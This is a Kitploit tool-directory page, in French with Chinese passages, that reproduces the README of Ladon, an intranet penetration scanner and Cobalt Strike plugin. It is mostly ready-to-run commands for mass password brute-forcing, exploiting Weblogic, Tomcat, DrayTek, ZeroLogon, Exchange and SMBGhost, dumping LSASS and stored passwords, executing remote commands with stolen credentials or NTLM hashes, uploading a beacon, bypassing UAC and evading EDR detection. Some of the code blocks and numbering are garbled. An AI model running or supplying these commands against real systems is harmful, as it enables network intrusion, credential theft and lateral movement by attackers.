Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Ladon — Ladon大型内网渗透扫描器,PowerShell、Cobalt Strike插件、内存加载、无文件扫描。含端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描等。网络资产探测32种协议(ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP)或方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、交换机、数据库、打印机等,大量高危漏洞检测模块MS17010、Zimbra、Exchange | Kitploit
Outils/GitHubGitHub/k8gege/ladon
Privilege EscalationReconnaissanceVulnerability ScannersNetwork MappingPassword AttacksPort ScanningExploitationLateral MovementInformation GatheringWeb SecurityPenetration TestingSubdomain Enumeration
5.3k882il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Ladon大型内网渗透扫描器,PowerShell、Cobalt Strike插件、内存加载、无文件扫描。含端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描等。网络资产探测32种协议(ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP)或方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、交换机、数据库、打印机等,大量高危漏洞检测模块MS17010、Zimbra、Exchange

GitHubk8gege/ladon

Ladon

Voir le dépôtSite web
Partager

Ladon - Scanner de pénétration de grand réseau interne - Chargement mémoire du plugin Cobalt Strike

Author Ladon Bin GitHub issues Github Stars GitHub forks GitHub license Downloads

image

Présentation du programme

Ladon est un scanner de pénétration de grand réseau interne, outil de pénétration de domaine et outil latéral, module PowerShell, plugin Cobalt Strike, chargement en mémoire, scan sans fichier. Il contient le scan de ports, l'identification de services, la détection d'actifs réseau, l'audit de mots de passe, la détection de vulnérabilités critiques, l'exploitation de vulnérabilités, la lecture de mots de passe et le GetShell en un clic, prend en charge le scan par lots des segments A/B/C et le scan inter-segments, ainsi que le scan d'URL, d'hôtes, de listes de domaines, etc. La version 12.2 intègre 262 modules fonctionnels. Le module de détection d'actifs réseau comprend 30+ protocoles (ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP) ainsi que des méthodes pour obtenir rapidement les adresses IP des hôtes actifs, noms d'ordinateur, groupes de travail, ressources partagées, adresses de carte réseau, versions de système d'exploitation, sites web, sous-domaines, intergiciels, services ouverts, routeurs, commutateurs, bases de données, imprimantes, etc. La détection de vulnérabilités critiques 16+ inclut Cisco, Zimbra, Exchange, DrayTek, MS17010, SMBGhost, Weblogic, ActiveMQ, Tomcat, série Struts2, Printer, etc. L'audit de mots de passe 25+ comprend les bases de données (Mysql, Oracle, MSSQL), FTP, SSH, VNC, Windows (LDAP, SMB/IPC, NBT, WMI, SmbHash, WmiHash, Winrm), BasicAuth, Tomcat, Weblogic, Rar, etc. L'exécution de commandes à distance inclut (smbexec/wmiexe/psexec/atexec/sshexec/webshell). Le module d'identification des empreintes Web peut reconnaître 135+ (applications Web, intergiciels, types de scripts, types de pages), etc. L'élévation de privilèges locale 21+ inclut SweetPotato\BadPotato\EfsPotato\BypassUAC. Les plugins POC hautement personnalisables prennent en charge les assemblages .NET, les DLL (C#/Delphi/VC), les plugins écrits en PowerShell et autres langues. Il prend en charge l'appel par lots de tout programme ou commande externe via la configuration d'un fichier INI. Le générateur EXP peut générer des POC/EXP de vulnérabilités en un clic pour étendre rapidement les capacités de scan. Ladon prend en charge le chargement en mémoire des plugins Cobalt Strike, permettant un scan sans fichier pour un déplacement latéral rapide sur le réseau interne.

Téléchargement de Ladon```Bash

https://github.com/k8gege/Ladon/releases https://k8gege.org/Download

root@kitploit:~
### Utilisation simple

Bien que Ladon soit riche en fonctionnalités, son utilisation est très simple, tout le monde peut facilement prendre en main<br>
Avec seulement un ou deux paramètres, 90% des fonctionnalités sont disponibles. Un module équivaut à un nouvel outil.

### Environnement d'exécution

#### Windows

Ladon peut être utilisé sur les systèmes Windows avec .NET 2.0 ou version ultérieure (à partir de Windows 7, .NET est intégré)<br>
Tel que Cmd, PowerShell, Cmd à distance, WebShell, etc., et chargement en mémoire via Cobalt Strike<br>
Ladon.ps1 est parfaitement compatible avec PowerShell sur Win7-Win11/2025, chargement à distance sans fichier, indépendamment de la version, pour une pénétration sans fichier.

#### LadonGo multi-plateforme prend en charge Linux, Mac, Arm, MIPS
Multi-plateforme : Linux, MacOS, Windows, routeurs, équipements réseau, etc.<br>
https://github.com/k8gege/LadonGo

### Conditions particulières

En pratique, ce n'est pas toujours fluide ; certains réseaux internes sont très lents après redirection ou ne peuvent pas être redirigés, il faut alors télécharger l'outil sur la cible<br>
Certains chevaux de Troie mettent beaucoup de temps à télécharger un programme de 2-3 Mo, voire ne peuvent pas le faire du tout ; inutile de penser à des programmes Python de plusieurs dizaines de Mo<br>
Ladon est développé en C#, la taille du programme est d'environ 500 Ko, même si le cheval est mauvais, il peut télécharger un programme de 500 Ko<br>
Si cela ne fonctionne toujours pas, on peut utiliser un chargement en mémoire à distance via PowerShell, ce que les grands programmes compilés en Python ou Go ne peuvent pas égaler.

### Mission

Un service complet, fournir aux utilisateurs un outil de scan simple à utiliser, riche en fonctionnalités et hautement flexible.

### Caractéristiques

Faible trafic de scan<br>
Petite taille du programme<br>
Fonctionnalités riches et puissantes<br>
Programme simple et facile à utiliser<br>
Prise en charge de plusieurs langues pour les plugins<br>
Multi-plateforme (Win/Kali/Ubuntu), etc.<br>
Prise en charge des plugins Cobalt Strike<br>
Prise en charge de la pénétration sans fichier via PowerShell<br>
Le générateur d'exploit peut générer un PoC en un clic<br>
Plusieurs versions adaptées à divers environnements

### Fonctions des paramètres du programme

1  Prise en charge du scan d'une adresse IP spécifique<br>
2  Prise en charge du scan d'un nom de domaine spécifique<br>
3  Prise en charge du scan d'un nom de machine spécifique<br>
4  Prise en charge du scan d'un segment C spécifique (ip/24)<br>
5  Prise en charge du scan d'un segment B spécifique (ip/16)<br>
6  Prise en charge du scan d'un segment A spécifique (ip/8)<br>
7  Prise en charge du scan d'une URL spécifique<br>
8  Prise en charge du scan d'IP en lot (ip.txt)<br>
9  Prise en charge du scan de segments C en lot (ip24.txt)<br>
10 Prise en charge du scan de segments C en lot (ipc.txt)<br>
11 Prise en charge du scan de segments B en lot (ip16.txt)<br>
12 Prise en charge du scan d'URL en lot (url.txt)<br>
13 Prise en charge du scan de noms de domaine en lot (domain.txt)<br>
14 Prise en charge du scan de noms de machine en lot (host.txt)<br>
15 Prise en charge du scan de segments CIDR nationaux en lot (cidr.txt)<br>
16 Prise en charge d'une liste de chaînes en lot (str.txt)<br>
17 Prise en charge d'une liste de comptes/mots de passe hôtes (check.txt)<br>
18 Prise en charge d'une liste d'utilisateurs/mots de passe (userpass.txt)<br>
19 Prise en charge du scan d'une plage de segments C spécifique<br>
20 Prise en charge du chargement d'une DLL personnalisée via paramètre (C# uniquement)<br>
21 Prise en charge du chargement d'un EXE personnalisé via paramètre (C# uniquement)<br>
22 Prise en charge du chargement d'un fichier de configuration INI personnalisé via paramètre<br>
23 Prise en charge du chargement d'un PowerShell personnalisé via paramètre<br>
24 Prise en charge de programmes personnalisés (commandes système ou programmes tiers, c'est-à-dire des programmes ou scripts développés dans n'importe quel langage)<br>
25 Plugins (prise en charge de plusieurs langues : C#/Delphi/Golang/Python/VC/PowerShell)<br>
26 Prise en charge de Cobalt Strike (scan du réseau interne cible sous ligne de commande beacon ou scan d'objectifs externes via un relais)<br>
27 Prise en charge du scan d'IP au format CIDR, par exemple 100.64.0.0/10, 192.168.1.1/20, etc.<br>
28 La configuration INI prend en charge le bruteforce de mots de passe pour les programmes personnalisés

### Guide d'utilisation rapide

Guide d'utilisation rapide de Ladon - Documentation complète : http://k8gege.org/Ladon <br>
Document des fonctions du module Excel : http://k8gege.org/Ladon/wiki.xlsx <br>
Prise en charge du chargement en mémoire via Cmd, Cobalt Strike, PowerShell, etc.<br>
Version Windows : .Net, Cobalt Strike, PowerShell<br>
Version tous systèmes : Go (multi-plateforme), Python (théoriquement multi-plateforme)<br>
PS : Study est pratique pour l'apprentissage local, utilisez CMD pour toutes les fonctionnalités.

### Scan BypassEDR

La vitesse de scan par défaut est très rapide, mais certaines défenses WAF ou EDR sont très fortes<br>
Même avec quelques threads, il est possible que le scan ne fonctionne plus après environ 20 minutes<br>
bypassEDR simule un accès humain pour contourner les stratégies de détection de vitesse<br>

La vitesse de scan est lente, les personnes imprudentes qui recherchent la vitesse ne doivent pas l'utiliser<br>```Bash
Ladon 10.1.2.8/24 MS17010 bypassEDR

Les modules liés au brute-force de mots de passe ne supportent pas encore le paramètre bypassEDR

001 Scan de threads personnalisé

Exemple : scanner la cible sur le segment 10.1.2 pour vérifier la vulnérabilité MS17010
Monothread :```Bash Ladon 10.1.2.8/24 MS17010 t=1

root@kitploit:~
80 threads:```Bash
Ladon noping 10.1.2.8/24 MS17010 t=80

Sous une protection élevée, réduisez les threads de scan, F monothread
```Bash Ladon 10.1.2.8/24 MS17010 f=1

root@kitploit:~
### 002 Scan de proxy Socks5
Exemple : Utilisation de 8 threads pour scanner si le segment 10.1.2 de la cible présente la vulnérabilité MS17010<br>```Bash
Ladon noping 10.1.2.8/24 MS17010 t=8

Voir : http://k8gege.org/Ladon/proxy.html

PS : L'outil proxy ne prend pas en charge Socks5, il faut donc ajouter le paramètre noping pour le scan
Que ce soit Frp ou d'autres outils similaires, le principal problème est que des outils comme Proxifier ne prennent pas en charge le protocole ICMP
Parce que Ladon utilise par défaut ICMP pour détecter les hôtes actifs avant d'utiliser le module correspondant pour tester
Donc dans un environnement proxy, il faut désactiver le scan ping, car le ping système utilise le protocole ICMP

003 Scan de sous‑réseau / Scan par lots

Format CIDR : pas seulement /24/16/8 (tous)```Bash Ladon 192.168.1.8/24 扫描模块 Ladon 192.168.1.8/16 扫描模块 Ladon 192.168.1.8/8 扫描模块

root@kitploit:~
Format des lettres : seulement les segments C, B, A classés dans l'ordre.```Bash
Ladon 192.168.1.8/c 扫描模块
Ladon 192.168.1.8/b 扫描模块
Ladon 192.168.1.8/a 扫描模块

0x004 Spécifier la plage IP, scan de sous-réseau

Détection ICMP des hôtes actifs dans la plage 50-200 du segment 1```Bash

Ladon 192.168.1.50-192.168.1.200 ICMP

root@kitploit:~
#### Sondage ICMP des hôtes actifs de 1.30 à 50.80```Bash
Ladon 192.168.1.30-192.168.50.80 ICMP  

Format TXT

004 Balayage par lots ICMP des hôtes actifs dans une liste de segments C```Bash

Ladon ip24.txt ICMP Ladon ipc.txt ICMP

root@kitploit:~
##### 005 ICMP analyse par lots des hôtes actifs dans la liste du segment B```Bash
Ladon ip16.txt ICMP
006 Balancing ICMP en masse d'une liste CIDR (ex: plage IP d'un pays)```Bash

Ladon cidr.txt ICMP

root@kitploit:~
##### 007 Scan batch ICMP de disponibilité des domaines```Bash
Ladon domain.txt ICMP
008 ICMP - scan groupé pour vérifier si les machines sont actives (détection par nom d'hôte ou machine)```Bash

Ladon host.txt ICMP

root@kitploit:~
##### 009 WhatCMS - Identifier en masse des CMS, bannières, certificats SSL, titres ; peut reconnaître des CMS inconnus, routeurs, imprimantes, équipements réseau, caméras, etc.```Bash
Ladon 192.168.1.8 WhatCMS   扫描IP
Ladon 192.168.1.8/24 WhatCMS   扫描C段
Ladon 192.168.1.8/C WhatCMS   扫描C段
Ladon 192.168.1.8/B WhatCMS   扫描B段
Ladon 192.168.1.8/A WhatCMS   扫描A段
Ladon IP.TXT WhatCMS   扫描IP列表
Ladon IP24.TXT WhatCMS   扫描C段列表
Ladon IP16.TXT WhatCMS   扫描B段列表
Ladon cidr.TXT WhatCMS   扫描整个国家IP段列表
禁PING扫描<br>
Ladon noping 192.168.1.8 WhatCMS   扫描IP
Ladon noping 192.168.1.8/24 WhatCMS   扫描C段
010 Détection en masse des versions, vulnérabilités et mots de passe faibles des routeurs DrayTek```Bash

Ladon url.txt DraytekPoc

root@kitploit:~
##### 011 Déchiffrement en masse de mots de passe Base64```Bash
Ladon str.txt DeBase64

Scan d'actifs, identification d'empreintes, identification de services, hôtes en vie, scan de ports

image

012 Scan ICMP des hôtes en vie (le plus rapide)```Bash

Ladon 192.168.1.8/24 ICMP

root@kitploit:~
##### 013 Ping détection des hôtes actifs (appel de la commande système Ping, écho des informations ms, ttl, etc.)```Bash
Ladon 192.168.1.8/24 Ping

Si tu penses que la commande ping doit fonctionner pour être en vie, tu peux utiliser cette commande par lots

014 Détection multi-protocole des hôtes actifs (IP, nom d'hôte, MAC/domaine, fabricant/version du système)```Bash

Ladon 192.168.1.8/24 OnlinePC

root@kitploit:~
##### 015 Identification multi-protocole du système d'exploitation (IP, nom de machine, version du système d'exploitation, services ouverts)```Bash
Ladon 192.168.1.8/24 OsInfo
016 Détection OXID d'hôtes multi-cartes réseau```Bash

Ladon 192.168.1.8/24 EthInfo Ladon 192.168.1.8/24 OxidInfo

root@kitploit:~
##### 017 Détection DNS d'hôte multi-cartes réseau```Bash
Ladon 192.168.1.8/24 DnsInfo
018 Scan multi-protocole des adresses IP des hôtes actifs```Bash

Ladon 192.168.1.8/24 OnlineIP

root@kitploit:~
##### 019 Scanner la vulnérabilité SMB MS17010 (IP, nom de la machine, numéro de vulnérabilité, version du système d'exploitation)```Bash
Ladon 192.168.1.8/24 MS17010
020 Détection de vulnérabilité SMBGhost CVE-2020-0796 (IP、nom de la machine、numéro de vulnérabilité、version du système d'exploitation)```Bash

Ladon 192.168.1.8/24 SMBGhost

root@kitploit:~
##### 021 Scanner le titre Web et le Banner - Pour des informations plus complètes, utilisez le module WhatCMS```Bash
Ladon 192.168.1.8/24 WebInfo
Ladon http://192.168.1.8 WebInfo
Ladon 192.168.1.8/24 WebScan
Ladon http://192.168.1.8 WebScan
022 Analyse des noms de domaine URL des sites du segment C```Bash

Ladon 192.168.1.8/24 UrlScan

root@kitploit:~
##### 023 Scan des domaines et URL des sites du segment C```Bash
Ladon 192.168.1.8/24 SameWeb
024 Scanner les sous-domaines et domaines de deuxième niveau```Bash

Ladon baidu.com SubDomain

root@kitploit:~
025 IP de résolution de nom de domaine, IP de résolution de nom d'hôte```Bash
Ladon baidu.com DomainIP
Ladon baidu.com HostIP
025 Résolution IP en lot de noms de domaine, résolution IP en lot de noms d'hôte```Bash

Ladon domain.txt DomainIP Ladon host.txt HostIP

root@kitploit:~
##### 025 Résolution de noms de domaine et d'hôtes en lot - Résultat uniquement des IP```Bash
Ladon domain.txt Domain2IP
Ladon host.txt Host2IP
026 Requête DNS pour machines et IP dans le domaine (conditions : dans le domaine, spécifier l'IP du contrôleur de domaine)```Bash

Ladon AdiDnsDump 192.168.1.8

root@kitploit:~
##### 027 Interroger les machines et IP dans le domaine (condition : dans le domaine)
Ladon GetDomainIP

##### 028 Scanner les ports du segment C, scan de ports spécifiés```Bash
Ladon 192.168.1.8/24 PortScan
Ladon 192.168.1.8 PortScan 80,445,3389
029 Scanner les segments C WEB et identifier les CMS (800+ reconnaissance d'empreintes Web)```Bash

Ladon 192.168.1.8/24 CMS Ladon 192.168.1.8/24 CmsInfo Ladon 192.168.1.8/24 WhatCMS

root@kitploit:~
##### 030 Scan des équipements Cisco```Bash
Ladon 192.168.1.8/24 CiscoInfo
Ladon http://192.168.1.8 CiscoInfo
031 Énumérer les hôtes de base de données Mssql (IP de la base de données, nom de la machine, version SQL)```Bash

Ladon EnumMssql

root@kitploit:~
##### 032 Énumérer les ressources de partage réseau (domaine, IP, nom d'hôte\chemin de partage)```Bash
Ladon EnumShare
033 Scan du serveur LDAP (détection du contrôleur de domaine)```Bash

Ladon 192.168.1.8/24 LdapInfo

root@kitploit:~
##### 034 Analyser le serveur FTP et identifier la version```Bash
Ladon 192.168.1.8/24 FtpInfo

Attaque par force brute / Authentification réseau / Mots de passe faibles / Craquage de mots de passe / Base de données / Panneau d'administration / Page de connexion / Connexion système

image Référence détaillée pour le craquage de mots de passe SSH : http://k8gege.org/Ladon/sshscan.html

035 Port 445 Craquage de mots de passe SMB (Windows)```Bash

Ladon 192.168.1.8/24 SmbScan

root@kitploit:~
##### 036 Port 135 Brute force de mot de passe Wmi (Windowns)```Bash
Ladon 192.168.1.8/24 WmiScan
037 Port 389 - Serveur LDAP, Brute force de mots de passe de domaine AD (Windows)```Bash

Ladon 192.168.1.8/24 LdapScan

root@kitploit:~
##### 038 Port 5985 Winrm bruteforce de mot de passe (Windowns)```Bash
Ladon 192.168.1.8/24 WinrmScan
039 port 445 SMB NTLM HASH bruteforce (Windows)```Bash

Ladon 192.168.1.8/24 SmbHashScan

root@kitploit:~
##### 040 port 135 Wmi NTLM HASH bruteforce(Windows)```Bash
Ladon 192.168.1.8/24 WmiHashScan
041 Brute force de mot de passe SSH sur le port 22 (Linux)```Bash

Ladon 192.168.1.8/24 SshScan Ladon 192.168.1.8:22 SshScan

root@kitploit:~
##### 042 Port 1433 Bruteforce de mot de passe de base de données MSSQL```Bash
Ladon 192.168.1.8/24 MssqlScan
043 port 1521 Bruteforce de mots de passe Oracle```Bash

Ladon 192.168.1.8/24 OracleScan

root@kitploit:~
La base de données Oracle est particulière, ne cibler que la base ORCL ferait manquer de nombreux privilèges<br>
Voir détails : http://k8gege.org/Ladon/OracleScan.html<br>


##### 044 Port 3306 - Brute force du mot de passe de la base de données MySQL```Bash
Ladon 192.168.1.8/24 MysqlScan
045 Port 7001 Brute force du mot de passe de la console d'administration Weblogic```Bash

Ladon http://192.168.1.8:7001/console WeblogicScan Ladon 192.168.1.8/24 WeblogicScan

root@kitploit:~
##### 046 Port 5900 - Brute-force de mot de passe VNC (bureau à distance)```Bash
Ladon 192.168.1.8/24 VncScan
047 Port 21 Attaque par force brute de mot de passe sur serveur FTP```Bash

Ladon 192.168.1.8/24 FtpScan

root@kitploit:~
##### 048 Bruteforce du mot de passe de connexion Tomcat sur le port 8080```Bash
Ladon 192.168.1.8/24 TomcatScan
Ladon http://192.168.1.8:8080/manage TomcatScan
049 Brute force de mot de passe d'authentification de base sur le port Web 401```Bash

Ladon http://192.168.1.8/login HttpBasicScan Ladon ip.txt 401Scan

root@kitploit:~
##### 052 port 139 protocole NetBIOS brute force de mots de passe Windows```Bash
Ladon 192.168.1.8/24 NbtScan
053 Bruteforce de mot de passe Windows via le protocole WinRM sur le port 5985```Bash

Ladon 192.168.1.8/24 WinrmScan

root@kitploit:~
##### 054 Bruteforce de mots de passe de webcam (mots de passe par défaut intégrés)```Bash
Ladon 192.168.1.8/24 DvrScan

Détection de vulnérabilité/Poc

image

055 Détection de vulnérabilité SMB(CVE-2017-0143/CVE-2017-0144)```Bash

Ladon 192.168.1.8/24 MS17010

root@kitploit:~
##### 056 Détection de vulnérabilité SMBGhost CVE-2020-0796		911 réservé```Bash
Ladon 192.168.1.8/24 SMBGhost
057 Détection de vulnérabilité Weblogic(CVE-2019-2725/CVE-2018-2894)```Bash

Ladon 192.168.1.8/24 WeblogicPoc

root@kitploit:~
##### 058 Détection de backdoor PhpStudy (phpstudy 2016/phpstudy 2018) 10.9 supprimé 911 conservé```Bash
Ladon 192.168.1.8/24 PhpStudyPoc
059 Détection de vulnérabilité ActiveMQ (CVE-2016-3088)```Bash

Ladon 192.168.1.8/24 ActivemqPoc

root@kitploit:~
##### 060 Détection de vulnérabilité Tomcat(CVE-2017-12615)```Bash
Ladon 192.168.1.8/24 TomcatPoc
061 Détection de vulnérabilités Struts2 (S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode/S2-045/S2-037)```Bash

Ladon 192.168.1.8/24 Struts2Poc

root@kitploit:~
##### 062 DraytekPoc CVE-2020-8515 détection de vulnérabilité, détection de version Draytek, détection de mots de passe faibles```Bash
Ladon 192.168.1.8 DraytekPoc
Ladon 192.168.1.8/24 DraytekPoc
FortiGate CVE-2024-55591 Détection de vulnérabilité RCE non autorisée```Bash

Ladon 192.168.1.8/24 CVE-2024-55591

root@kitploit:~
### Exploitation/Exploit
![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

##### 063 Exploitation Weblogic (CVE-2019-2725)```Bash
Ladon 192.168.1.8/24 WeblogicExp
064 Exploitation de la vulnérabilité Tomcat (CVE-2017-12615)```Bash

Ladon 192.168.1.8/24 TomcatExp

root@kitploit:~
##### 065 Générateur universel d'injection DLL pour exécution de CMD via vulnérabilité zero-day Windows (DLL de seulement 5 Ko)```Bash
Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=
Ladon CmdDll b64x64 YwBhAGwAYwA=
066 CVE-2021-40444 Vulnérabilité 0day Microsoft IE/Office```Bash

Ladon CVE-2021-40444 MakeCab poc.dll Ladon CVE-2021-40444 MakeHtml http://192.168.1.8

root@kitploit:~
##### 067 DraytekExp CVE-2020-8515 EXP d'exécution de commandes à distance```Bash
Ladon DraytekExp http://192.168.1.8  whoami
068 Pénétration de domaine ZeroLogon CVE-2020-1472 Élévation de privilèges du contrôleur de domaine (mot de passe vidé)```Bash

Ladon ZeroLogon dc.k8gege.org

root@kitploit:~
##### 069 CVE-2020-0688 Exchange vulnerability de sérialisation (.net 4.0)```Bash
Ladon cve-2020-0688 192.168.1.142 Administrator K8gege520
070 Exploitation de boucle ForExec (EternalBlack Win10 CVE-2020-0796, sortie réussie pour éviter l'écran bleu)```Bash

Ladon ForExec "CVE-2020-0796-Exp -i 192.168.1.8 -p 445 -e --load-shellcode test.txt" 80 "Exploit finnished"

root@kitploit:~
### Téléchargement de fichiers, transfert de fichiers

##### 071 Transfert de fichiers internes Téléchargement HTTP Téléchargement HTTPS Téléchargement MSF```Bash
Ladon wget https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe<br>
Ladon HttpDownLoad http://k8gege.org/Download/Ladon.rar
072 Transfert de fichiers intranet Téléchargement Ftp```Bash

Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe

root@kitploit:~
### Encryptage/Décryptage (HEX/Base64)

##### 073 Hex Encryptage/Décryptage```Bash
Ladon 123456 EnHex
Ladon 313233343536 DeHex
074 Base64 chiffrement et déchiffrement```Bash

Ladon 123456 EnBase64 Ladon MTIzNDU2 DeBase64 Ladon str.txt DeBase64

root@kitploit:~
### Reniflage réseau

##### 075 Reniflage de mot de passe FTP (lier l'IP locale, reniflage automatique du segment C)
Machine multi-cartes réseau, renifle l'IP du segment C correspondant```Bash
Ladon FtpSniffer 192.168.1.5
076 Reniflage de mots de passe HTTP (lier IP locale, sniffing automatique du segment C)

Machine multi-cartes réseau, sniffing des adresses IP du segment C correspondant```Bash Ladon HTTPSniffer 192.168.1.5

root@kitploit:~
##### 077 Reniflage réseau```Bash
Ladon Sniffer

Lecture de mots de passe

078 Lire les mots de passe des sites IIS, chemins des sites web```Bash

Ladon IISpwd

root@kitploit:~
##### 079 Lire les mots de passe WIFI connectés```Bash
Ladon WifiPwd
080 Lire le mot de passe FTP FileZilla```Bash

Ladon FileZillaPwd

root@kitploit:~
##### 081 Lire le Hash système, les mots de passe VPN, DPAPI-Key  10.9 supprimé```Bash
Ladon CVE-2021-36934  
082 DumpLsass mots de passe en mémoire (mimikatz en clair) limité à avant la version 9.1.1```Bash

Ladon DumpLsass

root@kitploit:~
### Collecte d'informations

![image](http://k8gege.org/k8img/Ladon/Study/Linfo.PNG)

##### 083 API Voir l'utilisateur actuel```Bash
Ladon w
Ladon whoami
083 Obtenir l'IP du réseau local et l'IP externe de la machine```Bash

Ladon GetIP Ladon IPinfo

root@kitploit:~
##### 084 Obtenir PCname GUID CPUID DiskID Mac地址```Bash
Ladon GetID
085 Voir les fichiers récemment accédés par l'utilisateur```Bash

Ladon Recent

root@kitploit:~
##### 086 Consultation des enregistrements d'utilisation des clés USB (nom USB, marqueur USB, informations de chemin)```Bash
Ladon UsbLog
087 Détection de backdoor (éléments de démarrage du registre, détournement de DLL)```Bash

Ladon CheckDoor Ladon AutoRun

root@kitploit:~
##### 088 Détails du processus (chemin du programme, architecture, paramètres de démarrage, utilisateur)```Bash
Ladon EnumProcess
Ladon Tasklist
089 Obtenir les arguments de la ligne de commande```Bash

Ladon cmdline Ladon cmdline cmd.exe

root@kitploit:~
##### 090 Obtenir les informations de base en test d'intrusion```Bash
Ladon GetInfo
Ladon GetInfo2
091 Version .NET & PowerShell```Bash

Ladon NetVer Ladon PSver Ladon NetVersion Ladon PSversion

root@kitploit:~
##### 092 Version d'exécution & environnement de compilation```Bash
Ladon Ver
Ladon Version
093 Versions d'exécution & Environnement de compilation & Liste des logiciels installés```Bash

Ladon AllVer Ladon AllVersion

root@kitploit:~
##### 094 Voir les informations du proxy IE```Bash
Ladon QueryProxy
095 DirList Liste de répertoires + informations de pénétration de base
Liste par défaut du disque entier
```Bash

Ladon DirList

root@kitploit:~
###### Spécifier le lecteur ou le répertoire```Bash
Ladon DirList c:\   
096 QueryAdmin Voir l'utilisateur administrateur```Bash

Ladon QueryAdmin

root@kitploit:~
##### 097 Voir les pipes nommés locaux```Bash
Ladon GetPipe
098 RdpLog Afficher les logs de connexion 3389```Bash

Ladon RdpLog

root@kitploit:~
### Exécution à distance (psexec/wmiexec/atexec/sshexec/smbexec)

![image](http://k8gege.org/k8img/Ladon/Study/Rexec.PNG)

##### 099 445 Port Exécution de commande PSEXEC à distance chiffrée (interactive)```Bash
net use \\192.168.1.8 k8gege520 /user:k8gege
Ladon psexec 192.168.1.8
psexec> whoami
nt authority\system
Ports 100 et 135 WmiExec exécution de commande à distance (non interactif)```Bash

Ladon wmiexec 192.168.1.8 k8gege k8gege520 cmd whoami Ladon wmiexec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p

root@kitploit:~
##### Exécution de commande distante AtExec sur les ports 101 et 445 (non interactive)```Bash
Ladon AtExec 192.168.1.8 k8gege k8gege520 whoami
102 Port 22 SshExec Exécution de commandes à distance(non interactif)```Bash

Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami

root@kitploit:~
##### 103 JspShell Exécution de commandes à distance (non interactif) 9.3.0 Supprimé
Usage: Ladon JspShell type url pwd cmd```Bash
Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami
104 WebShell Exécution de commande à distance (non interactive) supprimée dans 9.3.0```Bash

Usage:Ladon WebShell ScriptType ShellType url pwd cmd Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami Example: Ladon WebShell jsp 5 http://192.168.1.8/123.jsp Ladon whoami 获取系统版本信息 方便提权 Example: Ladon WebShell jsp 5 http://192.168.1.8/123.jsp Ladon OSinfo

root@kitploit:~
##### Ports 105 et 135 WmiExec2 exécution de commandes à distance avec HASH (non interactif) et téléchargement de fichiers```Bash
Ladon WmiExec2 host user pass cmd whoami
Ladon WmiExec2 pth host cmd whoami		 先Mimikatz注入Hash,再pth执行命令
Base64Cmd for Cobalt Strike
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Upload:
Ladon WmiExec2 host user pass upload beacon.exe ceacon.exe
Ladon WmiExec2 pth host upload beacon.exe ceacon.exe  先Mimikatz注入Hash,再pth执行命令
106 Port 445 SmbExec Ntlm-Hash Exécution de commande à distance non interactive (sans retour)```Bash

Ladon SmbExec 192.168.1.8 k8gege k8gege520 cmd whoami Ladon SmbExec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p

root@kitploit:~
##### 107 WinrmExec exécution de commande à distance sans retour (prend en charge les privilèges System)```Bash
Ladon WinrmExec 192.168.1.8 5985 k8gege.org Administrator K8gege520 calc.exe

Élévation et rétrogradation de privilèges

image

108 whoami afficher les privilèges et droits de l'utilisateur actuel```Bash

Ladon whoami

root@kitploit:~
##### 109  6 types de BypassUAC par liste blanche (après 8.0) Win7-Win10  Supprimé dans la version 10.8 Seulement 911 conservé  Utilisation: Ladon BypassUAC Method Base64Cmd```Bash
Ladon BypassUAC eventvwr Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC fodhelper Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC computerdefaults Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC sdclt Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC slui Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC dikcleanup Y21kIC9jIHN0YXJ0IGNhbGMuZXhlICYmIFJFTQ==
110 BypassUac2 exécution contournant l'UAC, prend en charge Win7-Win10 supprimé dans la version 10.8, conservé uniquement dans la version 911```Bash

Ladon BypassUac2 c:\1.exe Ladon BypassUac2 c:\1.bat

